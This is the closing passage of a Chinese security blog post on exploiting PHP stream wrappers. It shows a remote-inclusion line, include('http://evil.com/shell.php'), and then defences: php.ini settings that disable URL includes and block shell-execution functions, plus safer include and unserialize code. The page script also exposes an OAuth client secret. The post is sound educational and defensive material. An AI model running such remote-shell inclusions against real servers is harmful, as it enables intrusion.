<h2 id="http-https"><a href="#http-https" class="headerlink" title="http:// &#x2F; https://"></a><code>http://</code> &#x2F; <code>https://</code></h2><p><code>http://</code>允许从远程服务器加载恶意资源（如PHP脚本），执行代码或伪装合法请求</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;http://evil.com/shell.php&#x27;</span>)</span><br></pre></td></tr></table></figure>

<h1 id="防御手段"><a href="#防御手段" class="headerlink" title="防御手段"></a>防御手段</h1><ol>
<li>禁用危险Wrappers<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">allow_url_include=Off</span><br><span class="line">allow_url_fopen=Off</span><br><span class="line">disable_functions=system,passthru,exec,shell_exec,popen,proc_open</span><br></pre></td></tr></table></figure></li>
<li>使用 <code>is_readable()</code>验证文件路径<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">is_readable</span>(<span class="variable">$user_input_file</span>)) &#123;</span><br><span class="line">    <span class="keyword">include</span> <span class="variable">$user_input_file</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;Invalid file&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li>严格控制 <code>unserialize()</code><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$data</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$input</span>, [<span class="string">&#x27;allowed_classes&#x27;</span> =&gt; <span class="literal">false</span>]);</span><br></pre></td></tr></table></figure></li>
</ol>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><ol>
<li><a target="_blank" rel="external nofollow noopener noreferrer" href="https://www.php.net/manual/en/wrappers.php">https://www.php.net/manual/en/wrappers.php</a></li>
<li><a target="_blank" rel="external nofollow noopener noreferrer" href="https://www.thehacker.recipes/web/inputs/file-inclusion/lfi-to-rce/php-wrappers-and-streams">https://www.thehacker.recipes/web/inputs/file-inclusion/lfi-to-rce/php-wrappers-and-streams</a></li>
<li><a target="_blank" rel="external nofollow noopener noreferrer" href="https://medium.com/@robsfromashes/php-wrapper-and-local-file-inclusion-2fb82c891f55">https://medium.com/@robsfromashes/php-wrapper-and-local-file-inclusion-2fb82c891f55</a></li>
<li><a target="_blank" rel="external nofollow noopener noreferrer" href="https://www.freebuf.com/articles/web/193849.html">https://www.freebuf.com/articles/web/193849.html</a></li>
<li>php:&#x2F;&#x2F;filter chains:<ol>
<li><a target="_blank" rel="external nofollow noopener noreferrer" href="https://github.com/synacktiv/php_filter_chain_generator">https://github.com/synacktiv/php_filter_chain_generator</a></li>
<li><a target="_blank" rel="external nofollow noopener noreferrer" href="https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html">https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html</a></li>
</ol>
</li>
</ol>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Yiaos
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="https://www.thiiiiink.com/post/20250311021811.html" title="PHP Wrapper 利用">https://www.thiiiiink.com/post/20250311021811.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow noopener noreferrer" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/post/20250311023739.html" rel="prev" title="PHP LFI abuse">
      <i class="fa fa-chevron-left"></i> PHP LFI abuse
    </a></div>
      <div class="post-nav-item">
    <a href="/post/20250304004106.html" rel="next" title="Proving Grounds Practice - Heist">
      Proving Grounds Practice - Heist <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFphp-wrapper"><span class="nav-text">什么是php wrapper?</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#PHP%E5%86%85%E7%BD%AEWrapper%E5%88%97%E8%A1%A8"><span class="nav-text">PHP内置Wrapper列表</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#php-%E5%AD%90%E5%8C%85%E8%A3%85%E5%99%A8%E8%AF%A6%E8%A7%A3"><span class="nav-text">php:&#x2F;&#x2F; 子包装器详解</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-text">在渗透测试中的利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#file"><span class="nav-text">file:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#php-filter"><span class="nav-text">php:&#x2F;&#x2F;filter</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#data"><span class="nav-text">data:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#php-input"><span class="nav-text">php:&#x2F;&#x2F;input</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#expect"><span class="nav-text">expect:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#zip"><span class="nav-text">zip:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#phpar"><span class="nav-text">phpar:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#compress-zlib"><span class="nav-text">compress.zlib:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#compress-bzip2"><span class="nav-text">compress.bzip2:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ftp-ftps"><span class="nav-text">ftp:&#x2F;&#x2F; &#x2F; ftps:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#http-https"><span class="nav-text">http:&#x2F;&#x2F; &#x2F; https:&#x2F;&#x2F;</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1%E6%89%8B%E6%AE%B5"><span class="nav-text">防御手段</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-text">参考</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Yiaos</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">39</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/yiaos" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yiaos" rel="external nofollow noopener noreferrer" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="external nofollow noopener noreferrer" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yiaos</span>
</div>
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/medium-zoom@1/dist/medium-zoom.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  
  <script>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>




  
<script src="/js/local-search.js"></script>













  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'Ov23lioxBWzEMyWt1JhD',
      clientSecret: '6d63e8f9065e954d63e6a90407d40a3ccee85f0e',
      repo        : 'Yiaos.github.io',
      owner       : 'Yiaos',
      admin       : ['Yiaos'],
      id          : 'c4324c98d612b73086ae04e806b46703',
        language: 'en',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
